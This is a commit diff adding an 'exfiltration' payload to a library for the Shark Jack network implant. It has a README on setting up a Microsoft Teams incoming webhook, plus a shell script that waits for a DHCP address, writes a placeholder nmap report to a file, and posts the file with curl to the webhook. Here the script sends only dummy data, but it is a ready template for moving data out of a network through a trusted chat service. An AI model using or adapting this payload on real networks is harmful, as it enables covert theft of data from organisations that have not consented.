Merge pull request #51 from julesbozouklian/master

add exfiltration payload work with ms teams

payloads/library/exfiltration/ms-teams-exfiltration/README.md

@@ -0,0 +1,7 @@
+- Install following packages : ``` curl ```
+- Refer to this payload to install package https://github.com/julesbozouklian/shark_jack_payload/blob/main/payload/util/install_package.sh
+- Or SSH to the Shark jack and use following command : ``` opkg install curl ```
+
+- Create a Teams canal
+- Add the application Incoming Webhook
+- Get your WebHook URL

payloads/library/exfiltration/ms-teams-exfiltration/payload.sh

@@ -0,0 +1,48 @@
+#!/bin/sh
+# Title:        Ms Teams
+# Description:  Exfiltrate data with microsoft teams
+
+# Author:       Jules Bozouklian - bozou_client
+# Version:      1.0
+# Category:     Exfiltrate
+#
+# LED SETUP (Magenta)... Setting logs and waiting for IP address from DHCP
+# LED ATTACK (Yellow)... Send message
+#
+
+LOG_DIR=/root/loot/exfiltrate/ms-teams
+TIMESTAMP=`date +"%Y-%m-%d"`
+
+WEB_HOOK_URL=""
+
+
+LED SETUP
+
+NETMODE DHCP_CLIENT
+
+# Make log file
+mkdir -p $LOG_DIR
+LOG_FILE=$TIMESTAMP"_$(find $LOG_DIR -type f | wc -l).log"
+LOG="$LOG_DIR/$LOG_FILE"
+
+# Wait until Shark Jack has an IP address
+while [ -z "$IPADDR" ]; do sleep 1 && IPADDR=$(ifconfig eth0 | grep "inet addr"); done
+
+LED ATTACK
+
+# create a fake file to send
+touch /root/test-file.txt
+echo "Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-19 19:12 CET
+Nmap scan report for scanme.nmap.org (45.33.32.156)
+Host is up (0.15s latency).
+Other addresses for scanme.nmap.org (not scanned): 2600:3c01::f03c:91ff:fe18:bb2f
+Not shown: 995 closed tcp ports (conn-refused)" >> /root/test-file.txt
+
+
+function sendToMsTeams() {
+    curl -H 'Content-Type: application/json' -X POST -d "{'text': '$(printf '%s' $(cat /root/test-file.txt))'}" $WEB_HOOK_URL
+}
+
+sendToMsTeams
+
+LED FINISH